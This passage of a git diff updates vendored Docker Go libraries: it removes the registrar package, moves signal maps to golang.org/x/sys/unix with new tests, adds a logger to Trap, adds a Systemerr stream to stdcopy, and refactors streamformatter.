w.Close() + + err = cmd.Start() + assert.NilError(t, err, "Error on re-exec cmd: %v", err) + err = cmd.Wait() + assert.Error(t, err, "exit status 2") +} + +func TestNaiveSelf(t *testing.T) { + if os.Getenv("TEST_CHECK") == "1" { + os.Exit(2) + } + cmd := exec.Command(naiveSelf(), "-test.run=TestNaiveSelf") + cmd.Env = append(os.Environ(), "TEST_CHECK=1") + err := cmd.Start() + assert.NilError(t, err, "Unable to start command") + err = cmd.Wait() + assert.Error(t, err, "exit status 2") + + os.Args[0] = "mkdir" + assert.Check(t, naiveSelf() != os.Args[0]) +} diff --git a/vendor/github.com/docker/docker/pkg/registrar/registrar.go b/vendor/github.com/docker/docker/pkg/registrar/registrar.go deleted file mode 100644 index 1e75ee995b..0000000000 --- a/vendor/github.com/docker/docker/pkg/registrar/registrar.go +++ /dev/null @@ -1,127 +0,0 @@ -// Package registrar provides name registration. It reserves a name to a given key. -package registrar - -import ( - "errors" - "sync" -) - -var ( - // ErrNameReserved is an error which is returned when a name is requested to be reserved that already is reserved - ErrNameReserved = errors.New("name is reserved") - // ErrNameNotReserved is an error which is returned when trying to find a name that is not reserved - ErrNameNotReserved = errors.New("name is not reserved") - // ErrNoSuchKey is returned when trying to find the names for a key which is not known - ErrNoSuchKey = errors.New("provided key does not exist") -) - -// Registrar stores indexes a list of keys and their registered names as well as indexes names and the key that they are registered to -// Names must be unique. -// Registrar is safe for concurrent access. -type Registrar struct { - idx map[string][]string - names map[string]string - mu sync.Mutex -} - -// NewRegistrar creates a new Registrar with the an empty index -func NewRegistrar() *Registrar { - return &Registrar{ - idx: make(map[string][]string), - names: make(map[string]string), - } -} - -// Reserve registers a key to a name -// Reserve is idempotent -// Attempting to reserve a key to a name that already exists results in an `ErrNameReserved` -// A name reservation is globally unique -func (r *Registrar) Reserve(name, key string) error { - r.mu.Lock() - defer r.mu.Unlock() - - if k, exists := r.names[name]; exists { - if k != key { - return ErrNameReserved - } - return nil - } - - r.idx[key] = append(r.idx[key], name) - r.names[name] = key - return nil -} - -// Release releases the reserved name -// Once released, a name can be reserved again -func (r *Registrar) Release(name string) { - r.mu.Lock() - defer r.mu.Unlock() - - key, exists := r.names[name] - if !exists { - return - } - - for i, n := range r.idx[key] { - if n != name { - continue - } - r.idx[key] = append(r.idx[key][:i], r.idx[key][i+1:]...) - break - } - - delete(r.names, name) - - if len(r.idx[key]) == 0 { - delete(r.idx, key) - } -} - -// Delete removes all reservations for the passed in key. -// All names reserved to this key are released. -func (r *Registrar) Delete(key string) { - r.mu.Lock() - for _, name := range r.idx[key] { - delete(r.names, name) - } - delete(r.idx, key) - r.mu.Unlock() -} - -// GetNames lists all the reserved names for the given key -func (r *Registrar) GetNames(key string) ([]string, error) { - r.mu.Lock() - defer r.mu.Unlock() - - names, exists := r.idx[key] - if !exists { - return nil, ErrNoSuchKey - } - return names, nil -} - -// Get returns the key that the passed in name is reserved to -func (r *Registrar) Get(name string) (string, error) { - r.mu.Lock() - key, exists := r.names[name] - r.mu.Unlock() - - if !exists { - return "", ErrNameNotReserved - } - return key, nil -} - -// GetAll returns all registered names -func (r *Registrar) GetAll() map[string][]string { - out := make(map[string][]string) - - r.mu.Lock() - // copy index into out - for id, names := range r.idx { - out[id] = names - } - r.mu.Unlock() - return out -} diff --git a/vendor/github.com/docker/docker/pkg/registrar/registrar_test.go b/vendor/github.com/docker/docker/pkg/registrar/registrar_test.go deleted file mode 100644 index 0c1ef312ae..0000000000 --- a/vendor/github.com/docker/docker/pkg/registrar/registrar_test.go +++ /dev/null @@ -1,119 +0,0 @@ -package registrar - -import ( - "reflect" - "testing" -) - -func TestReserve(t *testing.T) { - r := NewRegistrar() - - obj := "test1" - if err := r.Reserve("test", obj); err != nil { - t.Fatal(err) - } - - if err := r.Reserve("test", obj); err != nil { - t.Fatal(err) - } - - obj2 := "test2" - err := r.Reserve("test", obj2) - if err == nil { - t.Fatalf("expected error when reserving an already reserved name to another object") - } - if err != ErrNameReserved { - t.Fatal("expected `ErrNameReserved` error when attempting to reserve an already reserved name") - } -} - -func TestRelease(t *testing.T) { - r := NewRegistrar() - obj := "testing" - - if err := r.Reserve("test", obj); err != nil { - t.Fatal(err) - } - r.Release("test") - r.Release("test") // Ensure there is no panic here - - if err := r.Reserve("test", obj); err != nil { - t.Fatal(err) - } -} - -func TestGetNames(t *testing.T) { - r := NewRegistrar() - obj := "testing" - names := []string{"test1", "test2"} - - for _, name := range names { - if err := r.Reserve(name, obj); err != nil { - t.Fatal(err) - } - } - r.Reserve("test3", "other") - - names2, err := r.GetNames(obj) - if err != nil { - t.Fatal(err) - } - - if !reflect.DeepEqual(names, names2) { - t.Fatalf("Exepected: %v, Got: %v", names, names2) - } -} - -func TestDelete(t *testing.T) { - r := NewRegistrar() - obj := "testing" - names := []string{"test1", "test2"} - for _, name := range names { - if err := r.Reserve(name, obj); err != nil { - t.Fatal(err) - } - } - - r.Reserve("test3", "other") - r.Delete(obj) - - _, err := r.GetNames(obj) - if err == nil { - t.Fatal("expected error getting names for deleted key") - } - - if err != ErrNoSuchKey { - t.Fatal("expected `ErrNoSuchKey`") - } -} - -func TestGet(t *testing.T) { - r := NewRegistrar() - obj := "testing" - name := "test" - - _, err := r.Get(name) - if err == nil { - t.Fatal("expected error when key does not exist") - } - if err != ErrNameNotReserved { - t.Fatal(err) - } - - if err := r.Reserve(name, obj); err != nil { - t.Fatal(err) - } - - if _, err = r.Get(name); err != nil { - t.Fatal(err) - } - - r.Delete(obj) - _, err = r.Get(name) - if err == nil { - t.Fatal("expected error when key does not exist") - } - if err != ErrNameNotReserved { - t.Fatal(err) - } -} diff --git a/vendor/github.com/docker/docker/pkg/signal/signal.go b/vendor/github.com/docker/docker/pkg/signal/signal.go index 68bb77cf58..88ef7b5ea2 100644 --- a/vendor/github.com/docker/docker/pkg/signal/signal.go +++ b/vendor/github.com/docker/docker/pkg/signal/signal.go @@ -1,6 +1,6 @@ // Package signal provides helper functions for dealing with signals across // various operating systems. -package signal +package signal // import "github.com/docker/docker/pkg/signal" import ( "fmt" @@ -13,7 +13,7 @@ import ( // CatchAll catches all signals and relays them to the specified channel. func CatchAll(sigc chan os.Signal) { - handledSigs := []os.Signal{} + var handledSigs []os.Signal for _, s := range SignalMap { handledSigs = append(handledSigs, s) } diff --git a/vendor/github.com/docker/docker/pkg/signal/signal_darwin.go b/vendor/github.com/docker/docker/pkg/signal/signal_darwin.go index 946de87e94..ee5501e3d9 100644 --- a/vendor/github.com/docker/docker/pkg/signal/signal_darwin.go +++ b/vendor/github.com/docker/docker/pkg/signal/signal_darwin.go @@ -1,4 +1,4 @@ -package signal +package signal // import "github.com/docker/docker/pkg/signal" import ( "syscall" diff --git a/vendor/github.com/docker/docker/pkg/signal/signal_freebsd.go b/vendor/github.com/docker/docker/pkg/signal/signal_freebsd.go index 6b9569bb75..764f90e264 100644 --- a/vendor/github.com/docker/docker/pkg/signal/signal_freebsd.go +++ b/vendor/github.com/docker/docker/pkg/signal/signal_freebsd.go @@ -1,4 +1,4 @@ -package signal +package signal // import "github.com/docker/docker/pkg/signal" import ( "syscall" diff --git a/vendor/github.com/docker/docker/pkg/signal/signal_linux.go b/vendor/github.com/docker/docker/pkg/signal/signal_linux.go index d418cbe9e3..caed97c963 100644 --- a/vendor/github.com/docker/docker/pkg/signal/signal_linux.go +++ b/vendor/github.com/docker/docker/pkg/signal/signal_linux.go @@ -1,7 +1,9 @@ -package signal +package signal // import "github.com/docker/docker/pkg/signal" import ( "syscall" + + "golang.org/x/sys/unix" ) const ( @@ -11,41 +13,40 @@ const ( // SignalMap is a map of Linux signals. var SignalMap = map[string]syscall.Signal{ - "ABRT": syscall.SIGABRT, - "ALRM": syscall.SIGALRM, - "BUS": syscall.SIGBUS, - "CHLD": syscall.SIGCHLD, - "CLD": syscall.SIGCLD, - "CONT": syscall.SIGCONT, - "FPE": syscall.SIGFPE, - "HUP": syscall.SIGHUP, - "ILL": syscall.SIGILL, - "INT": syscall.SIGINT, - "IO": syscall.SIGIO, - "IOT": syscall.SIGIOT, - "KILL": syscall.SIGKILL, - "PIPE": syscall.SIGPIPE, - "POLL": syscall.SIGPOLL, - "PROF": syscall.SIGPROF, - "PWR": syscall.SIGPWR, - "QUIT": syscall.SIGQUIT, - "SEGV": syscall.SIGSEGV, - "STKFLT": syscall.SIGSTKFLT, - "STOP": syscall.SIGSTOP, - "SYS": syscall.SIGSYS, - "TERM": syscall.SIGTERM, - "TRAP": syscall.SIGTRAP, - "TSTP": syscall.SIGTSTP, - "TTIN": syscall.SIGTTIN, - "TTOU": syscall.SIGTTOU, - "UNUSED": syscall.SIGUNUSED, - "URG": syscall.SIGURG, - "USR1": syscall.SIGUSR1, - "USR2": syscall.SIGUSR2, - "VTALRM": syscall.SIGVTALRM, - "WINCH": syscall.SIGWINCH, - "XCPU": syscall.SIGXCPU, - "XFSZ": syscall.SIGXFSZ, + "ABRT": unix.SIGABRT, + "ALRM": unix.SIGALRM, + "BUS": unix.SIGBUS, + "CHLD": unix.SIGCHLD, + "CLD": unix.SIGCLD, + "CONT": unix.SIGCONT, + "FPE": unix.SIGFPE, + "HUP": unix.SIGHUP, + "ILL": unix.SIGILL, + "INT": unix.SIGINT, + "IO": unix.SIGIO, + "IOT": unix.SIGIOT, + "KILL": unix.SIGKILL, + "PIPE": unix.SIGPIPE, + "POLL": unix.SIGPOLL, + "PROF": unix.SIGPROF, + "PWR": unix.SIGPWR, + "QUIT": unix.SIGQUIT, + "SEGV": unix.SIGSEGV, + "STKFLT": unix.SIGSTKFLT, + "STOP": unix.SIGSTOP, + "SYS": unix.SIGSYS, + "TERM": unix.SIGTERM, + "TRAP": unix.SIGTRAP, + "TSTP": unix.SIGTSTP, + "TTIN": unix.SIGTTIN, + "TTOU": unix.SIGTTOU, + "URG": unix.SIGURG, + "USR1": unix.SIGUSR1, + "USR2": unix.SIGUSR2, + "VTALRM": unix.SIGVTALRM, + "WINCH": unix.SIGWINCH, + "XCPU": unix.SIGXCPU, + "XFSZ": unix.SIGXFSZ, "RTMIN": sigrtmin, "RTMIN+1": sigrtmin + 1, "RTMIN+2": sigrtmin + 2, diff --git a/vendor/github.com/docker/docker/pkg/signal/signal_linux_test.go b/vendor/github.com/docker/docker/pkg/signal/signal_linux_test.go new file mode 100644 index 0000000000..9a021e2164 --- /dev/null +++ b/vendor/github.com/docker/docker/pkg/signal/signal_linux_test.go @@ -0,0 +1,59 @@ +// +build darwin linux + +package signal // import "github.com/docker/docker/pkg/signal" + +import ( + "os" + "syscall" + "testing" + "time" + + "gotest.tools/assert" + is "gotest.tools/assert/cmp" +) + +func TestCatchAll(t *testing.T) { + sigs := make(chan os.Signal, 1) + CatchAll(sigs) + defer StopCatch(sigs) + + listOfSignals := map[string]string{ + "CONT": syscall.SIGCONT.String(), + "HUP": syscall.SIGHUP.String(), + "CHLD": syscall.SIGCHLD.String(), + "ILL": syscall.SIGILL.String(), + "FPE": syscall.SIGFPE.String(), + "CLD": syscall.SIGCLD.String(), + } + + for sigStr := range listOfSignals { + signal, ok := SignalMap[sigStr] + if ok { + go func() { + time.Sleep(1 * time.Millisecond) + syscall.Kill(syscall.Getpid(), signal) + }() + + s := <-sigs + assert.Check(t, is.Equal(s.String(), signal.String())) + } + + } +} + +func TestStopCatch(t *testing.T) { + signal := SignalMap["HUP"] + channel := make(chan os.Signal, 1) + CatchAll(channel) + go func() { + + time.Sleep(1 * time.Millisecond) + syscall.Kill(syscall.Getpid(), signal) + }() + signalString := <-channel + assert.Check(t, is.Equal(signalString.String(), signal.String())) + + StopCatch(channel) + _, ok := <-channel + assert.Check(t, is.Equal(ok, false)) +} diff --git a/vendor/github.com/docker/docker/pkg/signal/signal_solaris.go b/vendor/github.com/docker/docker/pkg/signal/signal_solaris.go deleted file mode 100644 index 89576b9e3b..0000000000 --- a/vendor/github.com/docker/docker/pkg/signal/signal_solaris.go +++ /dev/null @@ -1,42 +0,0 @@ -package signal - -import ( - "syscall" -) - -// SignalMap is a map of Solaris signals. -// SIGINFO and SIGTHR not defined for Solaris -var SignalMap = map[string]syscall.Signal{ - "ABRT": syscall.SIGABRT, - "ALRM": syscall.SIGALRM, - "BUF": syscall.SIGBUS, - "CHLD": syscall.SIGCHLD, - "CONT": syscall.SIGCONT, - "EMT": syscall.SIGEMT, - "FPE": syscall.SIGFPE, - "HUP": syscall.SIGHUP, - "ILL": syscall.SIGILL, - "INT": syscall.SIGINT, - "IO": syscall.SIGIO, - "IOT": syscall.SIGIOT, - "KILL": syscall.SIGKILL, - "LWP": syscall.SIGLWP, - "PIPE": syscall.SIGPIPE, - "PROF": syscall.SIGPROF, - "QUIT": syscall.SIGQUIT, - "SEGV": syscall.SIGSEGV, - "STOP": syscall.SIGSTOP, - "SYS": syscall.SIGSYS, - "TERM": syscall.SIGTERM, - "TRAP": syscall.SIGTRAP, - "TSTP": syscall.SIGTSTP, - "TTIN": syscall.SIGTTIN, - "TTOU": syscall.SIGTTOU, - "URG": syscall.SIGURG, - "USR1": syscall.SIGUSR1, - "USR2": syscall.SIGUSR2, - "VTALRM": syscall.SIGVTALRM, - "WINCH": syscall.SIGWINCH, - "XCPU": syscall.SIGXCPU, - "XFSZ": syscall.SIGXFSZ, -} diff --git a/vendor/github.com/docker/docker/pkg/signal/signal_test.go b/vendor/github.com/docker/docker/pkg/signal/signal_test.go new file mode 100644 index 0000000000..0bfcf6ce44 --- /dev/null +++ b/vendor/github.com/docker/docker/pkg/signal/signal_test.go @@ -0,0 +1,34 @@ +package signal // import "github.com/docker/docker/pkg/signal" + +import ( + "syscall" + "testing" + + "gotest.tools/assert" + is "gotest.tools/assert/cmp" +) + +func TestParseSignal(t *testing.T) { + _, checkAtoiError := ParseSignal("0") + assert.Check(t, is.Error(checkAtoiError, "Invalid signal: 0")) + + _, error := ParseSignal("SIG") + assert.Check(t, is.Error(error, "Invalid signal: SIG")) + + for sigStr := range SignalMap { + responseSignal, error := ParseSignal(sigStr) + assert.Check(t, error) + signal := SignalMap[sigStr] + assert.Check(t, is.DeepEqual(signal, responseSignal)) + } +} + +func TestValidSignalForPlatform(t *testing.T) { + isValidSignal := ValidSignalForPlatform(syscall.Signal(0)) + assert.Check(t, is.Equal(false, isValidSignal)) + + for _, sigN := range SignalMap { + isValidSignal = ValidSignalForPlatform(syscall.Signal(sigN)) + assert.Check(t, is.Equal(true, isValidSignal)) + } +} diff --git a/vendor/github.com/docker/docker/pkg/signal/signal_unix.go b/vendor/github.com/docker/docker/pkg/signal/signal_unix.go index 5d058fd56b..a2aa4248fa 100644 --- a/vendor/github.com/docker/docker/pkg/signal/signal_unix.go +++ b/vendor/github.com/docker/docker/pkg/signal/signal_unix.go @@ -1,6 +1,6 @@ // +build !windows -package signal +package signal // import "github.com/docker/docker/pkg/signal" import ( "syscall" diff --git a/vendor/github.com/docker/docker/pkg/signal/signal_unsupported.go b/vendor/github.com/docker/docker/pkg/signal/signal_unsupported.go index c592d37dfe..1fd25a83c6 100644 --- a/vendor/github.com/docker/docker/pkg/signal/signal_unsupported.go +++ b/vendor/github.com/docker/docker/pkg/signal/signal_unsupported.go @@ -1,6 +1,6 @@ -// +build !linux,!darwin,!freebsd,!windows,!solaris +// +build !linux,!darwin,!freebsd,!windows -package signal +package signal // import "github.com/docker/docker/pkg/signal" import ( "syscall" diff --git a/vendor/github.com/docker/docker/pkg/signal/signal_windows.go b/vendor/github.com/docker/docker/pkg/signal/signal_windows.go index 440f2700e2..65752f24aa 100644 --- a/vendor/github.com/docker/docker/pkg/signal/signal_windows.go +++ b/vendor/github.com/docker/docker/pkg/signal/signal_windows.go @@ -1,6 +1,4 @@ -// +build windows - -package signal +package signal // import "github.com/docker/docker/pkg/signal" import ( "syscall" diff --git a/vendor/github.com/docker/docker/pkg/signal/testfiles/main.go b/vendor/github.com/docker/docker/pkg/signal/testfiles/main.go new file mode 100644 index 0000000000..e56854c7c3 --- /dev/null +++ b/vendor/github.com/docker/docker/pkg/signal/testfiles/main.go @@ -0,0 +1,43 @@ +package main + +import ( + "os" + "syscall" + "time" + + "github.com/docker/docker/pkg/signal" + "github.com/sirupsen/logrus" +) + +func main() { + sigmap := map[string]os.Signal{ + "TERM": syscall.SIGTERM, + "QUIT": syscall.SIGQUIT, + "INT": os.Interrupt, + } + signal.Trap(func() { + time.Sleep(time.Second) + os.Exit(99) + }, logrus.StandardLogger()) + go func() { + p, err := os.FindProcess(os.Getpid()) + if err != nil { + panic(err) + } + s := os.Getenv("SIGNAL_TYPE") + multiple := os.Getenv("IF_MULTIPLE") + switch s { + case "TERM", "INT": + if multiple == "1" { + for { + p.Signal(sigmap[s]) + } + } else { + p.Signal(sigmap[s]) + } + case "QUIT": + p.Signal(sigmap[s]) + } + }() + time.Sleep(2 * time.Second) +} diff --git a/vendor/github.com/docker/docker/pkg/signal/trap.go b/vendor/github.com/docker/docker/pkg/signal/trap.go index 638a1ab66c..2a6e69fb50 100644 --- a/vendor/github.com/docker/docker/pkg/signal/trap.go +++ b/vendor/github.com/docker/docker/pkg/signal/trap.go @@ -1,4 +1,4 @@ -package signal +package signal // import "github.com/docker/docker/pkg/signal" import ( "fmt" @@ -11,7 +11,6 @@ import ( "syscall" "time" - "github.com/Sirupsen/logrus" "github.com/pkg/errors" ) @@ -27,7 +26,9 @@ import ( // the docker daemon is not restarted and also running under systemd. // Fixes https://github.com/docker/docker/issues/19728 // -func Trap(cleanup func()) { +func Trap(cleanup func(), logger interface { + Info(args ...interface{}) +}) { c := make(chan os.Signal, 1) // we will handle INT, TERM, QUIT, SIGPIPE here signals := []os.Signal{os.Interrupt, syscall.SIGTERM, syscall.SIGQUIT, syscall.SIGPIPE} @@ -40,7 +41,7 @@ func Trap(cleanup func()) { } go func(sig os.Signal) { - logrus.Infof("Processing signal '%v'", sig) + logger.Info(fmt.Sprintf("Processing signal '%v'", sig)) switch sig { case os.Interrupt, syscall.SIGTERM: if atomic.LoadUint32(&interruptCount) < 3 { @@ -54,11 +55,11 @@ func Trap(cleanup func()) { } } else { // 3 SIGTERM/INT signals received; force exit without cleanup - logrus.Info("Forcing docker daemon shutdown without cleanup; 3 interrupts received") + logger.Info("Forcing docker daemon shutdown without cleanup; 3 interrupts received") } case syscall.SIGQUIT: DumpStacks("") - logrus.Info("Forcing docker daemon shutdown without cleanup on SIGQUIT") + logger.Info("Forcing docker daemon shutdown without cleanup on SIGQUIT") } //for the SIGINT/TERM, and SIGQUIT non-clean shutdown case, exit with 128 + signal # os.Exit(128 + int(sig.(syscall.Signal))) diff --git a/vendor/github.com/docker/docker/pkg/signal/trap_linux_test.go b/vendor/github.com/docker/docker/pkg/signal/trap_linux_test.go new file mode 100644 index 0000000000..14d1543117 --- /dev/null +++ b/vendor/github.com/docker/docker/pkg/signal/trap_linux_test.go @@ -0,0 +1,82 @@ +// +build linux + +package signal // import "github.com/docker/docker/pkg/signal" + +import ( + "fmt" + "io/ioutil" + "os" + "os/exec" + "syscall" + "testing" + + "gotest.tools/assert" + is "gotest.tools/assert/cmp" +) + +func buildTestBinary(t *testing.T, tmpdir string, prefix string) (string, string) { + tmpDir, err := ioutil.TempDir(tmpdir, prefix) + assert.NilError(t, err) + exePath := tmpDir + "/" + prefix + wd, _ := os.Getwd() + testHelperCode := wd + "/testfiles/main.go" + cmd := exec.Command("go", "build", "-o", exePath, testHelperCode) + err = cmd.Run() + assert.NilError(t, err) + return exePath, tmpDir +} + +func TestTrap(t *testing.T) { + var sigmap = []struct { + name string + signal os.Signal + multiple bool + }{ + {"TERM", syscall.SIGTERM, false}, + {"QUIT", syscall.SIGQUIT, true}, + {"INT", os.Interrupt, false}, + {"TERM", syscall.SIGTERM, true}, + {"INT", os.Interrupt, true}, + } + exePath, tmpDir := buildTestBinary(t, "", "main") + defer os.RemoveAll(tmpDir) + + for _, v := range sigmap { + cmd := exec.Command(exePath) + cmd.Env = append(os.Environ(), fmt.Sprintf("SIGNAL_TYPE=%s", v.name)) + if v.multiple { + cmd.Env = append(cmd.Env, "IF_MULTIPLE=1") + } + err := cmd.Start() + assert.NilError(t, err) + err = cmd.Wait() + if e, ok := err.(*exec.ExitError); ok { + code := e.Sys().(syscall.WaitStatus).ExitStatus() + if v.multiple { + assert.Check(t, is.DeepEqual(128+int(v.signal.(syscall.Signal)), code)) + } else { + assert.Check(t, is.Equal(99, code)) + } + continue + } + t.Fatal("process didn't end with any error") + } + +} + +func TestDumpStacks(t *testing.T) { + directory, err := ioutil.TempDir("", "test-dump-tasks") + assert.Check(t, err) + defer os.RemoveAll(directory) + dumpPath, err := DumpStacks(directory) + assert.Check(t, err) + readFile, _ := ioutil.ReadFile(dumpPath) + fileData := string(readFile) + assert.Check(t, is.Contains(fileData, "goroutine")) +} + +func TestDumpStacksWithEmptyInput(t *testing.T) { + path, err := DumpStacks("") + assert.Check(t, err) + assert.Check(t, is.Equal(os.Stderr.Name(), path)) +} diff --git a/vendor/github.com/docker/docker/pkg/stdcopy/stdcopy.go b/vendor/github.com/docker/docker/pkg/stdcopy/stdcopy.go index be20765457..8f6e0a737a 100644 --- a/vendor/github.com/docker/docker/pkg/stdcopy/stdcopy.go +++ b/vendor/github.com/docker/docker/pkg/stdcopy/stdcopy.go @@ -1,4 +1,4 @@ -package stdcopy +package stdcopy // import "github.com/docker/docker/pkg/stdcopy" import ( "bytes" @@ -20,6 +20,9 @@ const ( Stdout // Stderr represents standard error steam type. Stderr + // Systemerr represents errors originating from the system that make it + // into the multiplexed stream. + Systemerr stdWriterPrefixLen = 8 stdWriterFdIndex = 0 @@ -115,8 +118,9 @@ func StdCopy(dstout, dsterr io.Writer, src io.Reader) (written int64, err error) } } + stream := StdType(buf[stdWriterFdIndex]) // Check the first byte to know where to write - switch StdType(buf[stdWriterFdIndex]) { + switch stream { case Stdin: fallthrough case Stdout: @@ -125,6 +129,11 @@ func StdCopy(dstout, dsterr io.Writer, src io.Reader) (written int64, err error) case Stderr: // Write on stderr out = dsterr + case Systemerr: + // If we're on Systemerr, we won't write anywhere. + // NB: if this code changes later, make sure you don't try to write + // to outstream if Systemerr is the stream + out = nil default: return 0, fmt.Errorf("Unrecognized input header: %d", buf[stdWriterFdIndex]) } @@ -155,11 +164,18 @@ func StdCopy(dstout, dsterr io.Writer, src io.Reader) (written int64, err error) } } + // we might have an error from the source mixed up in our multiplexed + // stream. if we do, return it. + if stream == Systemerr { + return written, fmt.Errorf("error from daemon in stream: %s", string(buf[stdWriterPrefixLen:frameSize+stdWriterPrefixLen])) + } + // Write the retrieved frame (without header) nw, ew = out.Write(buf[stdWriterPrefixLen : frameSize+stdWriterPrefixLen]) if ew != nil { return 0, ew } + // If the frame has not been fully written: error if nw != frameSize { return 0, io.ErrShortWrite diff --git a/vendor/github.com/docker/docker/pkg/stdcopy/stdcopy_test.go b/vendor/github.com/docker/docker/pkg/stdcopy/stdcopy_test.go index 3137a75239..63edb855e5 100644 --- a/vendor/github.com/docker/docker/pkg/stdcopy/stdcopy_test.go +++ b/vendor/github.com/docker/docker/pkg/stdcopy/stdcopy_test.go @@ -1,4 +1,4 @@ -package stdcopy +package stdcopy // import "github.com/docker/docker/pkg/stdcopy" import ( "bytes" @@ -16,14 +16,14 @@ func TestNewStdWriter(t *testing.T) { } } -func TestWriteWithUnitializedStdWriter(t *testing.T) { +func TestWriteWithUninitializedStdWriter(t *testing.T) { writer := stdWriter{ Writer: nil, prefix: byte(Stdout), } n, err := writer.Write([]byte("Something here")) if n != 0 || err == nil { - t.Fatalf("Should fail when given an uncomplete or uninitialized StdWriter") + t.Fatalf("Should fail when given an incomplete or uninitialized StdWriter") } } @@ -246,6 +246,35 @@ func TestStdCopyDetectsNotFullyWrittenFrames(t *testing.T) { } } +// TestStdCopyReturnsErrorFromSystem tests that StdCopy correctly returns an +// error, when that error is muxed into the Systemerr stream. +func TestStdCopyReturnsErrorFromSystem(t *testing.T) { + // write in the basic messages, just so there's some fluff in there + stdOutBytes := []byte(strings.Repeat("o", startingBufLen)) + stdErrBytes := []byte(strings.Repeat("e", startingBufLen)) + buffer, err := getSrcBuffer(stdOutBytes, stdErrBytes) + if err != nil { + t.Fatal(err) + } + // add in an error message on the Systemerr stream + systemErrBytes := []byte(strings.Repeat("S", startingBufLen)) + systemWriter := NewStdWriter(buffer, Systemerr) + _, err = systemWriter.Write(systemErrBytes) + if err != nil { + t.Fatal(err) + } + + // now copy and demux. we should expect an error containing the string we + // wrote out + _, err = StdCopy(ioutil.Discard, ioutil.Discard, buffer) + if err == nil { + t.Fatal("expected error, got none") + } + if !strings.Contains(err.Error(), string(systemErrBytes)) { + t.Fatal("expected error to contain message") + } +} + func BenchmarkWrite(b *testing.B) { w := NewStdWriter(ioutil.Discard, Stdout) data := []byte("Test line for testing stdwriter performance\n") diff --git a/vendor/github.com/docker/docker/pkg/streamformatter/streamformatter.go b/vendor/github.com/docker/docker/pkg/streamformatter/streamformatter.go index ce6ea79dee..2b5e713040 100644 --- a/vendor/github.com/docker/docker/pkg/streamformatter/streamformatter.go +++ b/vendor/github.com/docker/docker/pkg/streamformatter/streamformatter.go @@ -1,5 +1,5 @@ // Package streamformatter provides helper functions to format a stream. -package streamformatter +package streamformatter // import "github.com/docker/docker/pkg/streamformatter" import ( "encoding/json" @@ -10,91 +10,76 @@ import ( "github.com/docker/docker/pkg/progress" ) -// StreamFormatter formats a stream, optionally using JSON. -type StreamFormatter struct { - json bool -} - -// NewStreamFormatter returns a simple StreamFormatter -func NewStreamFormatter() *StreamFormatter { - return &StreamFormatter{} -} - -// NewJSONStreamFormatter returns a StreamFormatter configured to stream json -func NewJSONStreamFormatter() *StreamFormatter { - return &StreamFormatter{true} -} - const streamNewline = "\r\n" -var streamNewlineBytes = []byte(streamNewline) +type jsonProgressFormatter struct{} -// FormatStream formats the specified stream. -func (sf *StreamFormatter) FormatStream(str string) []byte { - if sf.json { - b, err := json.Marshal(&jsonmessage.JSONMessage{Stream: str}) - if err != nil { - return sf.FormatError(err) - } - return append(b, streamNewlineBytes...) - } - return []byte(str + "\r") +func appendNewline(source []byte) []byte { + return append(source, []byte(streamNewline)...) } // FormatStatus formats the specified objects according to the specified format (and id). -func (sf *StreamFormatter) FormatStatus(id, format string, a ...interface{}) []byte { +func FormatStatus(id, format string, a ...interface{}) []byte { str := fmt.Sprintf(format, a...) - if sf.json { - b, err := json.Marshal(&jsonmessage.JSONMessage{ID: id, Status: str}) - if err != nil { - return sf.FormatError(err) - } - return append(b, streamNewlineBytes...) + b, err := json.Marshal(&jsonmessage.JSONMessage{ID: id, Status: str}) + if err != nil { + return FormatError(err) } - return []byte(str + streamNewline) + return appendNewline(b) } -// FormatError formats the specified error. -func (sf *StreamFormatter) FormatError(err error) []byte { - if sf.json { - jsonError, ok := err.(*jsonmessage.JSONError) - if !ok { - jsonError = &jsonmessage.JSONError{Message: err.Error()} - } - if b, err := json.Marshal(&jsonmessage.JSONMessage{Error: jsonError, ErrorMessage: err.Error()}); err == nil { - return append(b, streamNewlineBytes...) - } - return []byte("{\"error\":\"format error\"}" + streamNewline) +// FormatError formats the error as a JSON object +func FormatError(err error) []byte { + jsonError, ok := err.(*jsonmessage.JSONError) + if !ok { + jsonError = &jsonmessage.JSONError{Message: err.Error()} } - return []byte("Error: " + err.Error() + streamNewline) + if b, err := json.Marshal(&jsonmessage.JSONMessage{Error: jsonError, ErrorMessage: err.Error()}); err == nil { + return appendNewline(b) + } + return []byte(`{"error":"format error"}` + streamNewline) +} + +func (sf *jsonProgressFormatter) formatStatus(id, format string, a ...interface{}) []byte { + return FormatStatus(id, format, a...) } -// FormatProgress formats the progress information for a specified action. -func (sf *StreamFormatter) FormatProgress(id, action string, progress *jsonmessage.JSONProgress, aux interface{}) []byte { +// formatProgress formats the progress information for a specified action. +func (sf *jsonProgressFormatter) formatProgress(id, action string, progress *jsonmessage.JSONProgress, aux interface{}) []byte { if progress == nil { progress = &jsonmessage.JSONProgress{} } - if sf.json { - var auxJSON *json.RawMessage - if aux != nil { - auxJSONBytes, err := json.Marshal(aux) - if err != nil { - return nil - } - auxJSON = new(json.RawMessage) - *auxJSON = auxJSONBytes - } - b, err := json.Marshal(&jsonmessage.JSONMessage{ - Status: action, - ProgressMessage: progress.String(), - Progress: progress, - ID: id, - Aux: auxJSON, - }) + var auxJSON *json.RawMessage + if aux != nil { + auxJSONBytes, err := json.Marshal(aux) if err != nil { return nil } - return append(b, streamNewlineBytes...) + auxJSON = new(json.RawMessage) + *auxJSON = auxJSONBytes + } + b, err := json.Marshal(&jsonmessage.JSONMessage{ + Status: action, + ProgressMessage: progress.String(), + Progress: progress, + ID: id, + Aux: auxJSON, + }) + if err != nil { + return nil + } + return appendNewline(b) +} + +type rawProgressFormatter struct{} + +func (sf *rawProgressFormatter) formatStatus(id, format string, a ...interface{}) []byte { + return []byte(fmt.Sprintf(format, a...) + streamNewline) +} + +func (sf *rawProgressFormatter) formatProgress(id, action string, progress *jsonmessage.JSONProgress, aux interface{}) []byte { + if progress == nil { + progress = &jsonmessage.JSONProgress{} } endl := "\r" if progress.String() == "" { @@ -105,16 +90,23 @@ func (sf *StreamFormatter) FormatProgress(id, action string, progress *jsonmessa // NewProgressOutput returns a progress.Output object that can be passed to // progress.NewProgressReader. -func (sf *StreamFormatter) NewProgressOutput(out io.Writer, newLines bool) progress.Output { - return &progressOutput{ - sf: sf, - out: out, - newLines: newLines, - } +func NewProgressOutput(out io.Writer) progress.Output { + return &progressOutput{sf: &rawProgressFormatter{}, out: out, newLines: true} +} + +// NewJSONProgressOutput returns a progress.Output that that formats output +// using JSON objects +func NewJSONProgressOutput(out io.Writer, newLines bool) progress.Output { + return &progressOutput{sf: &jsonProgressFormatter{}, out: out, newLines: newLines} +} + +type 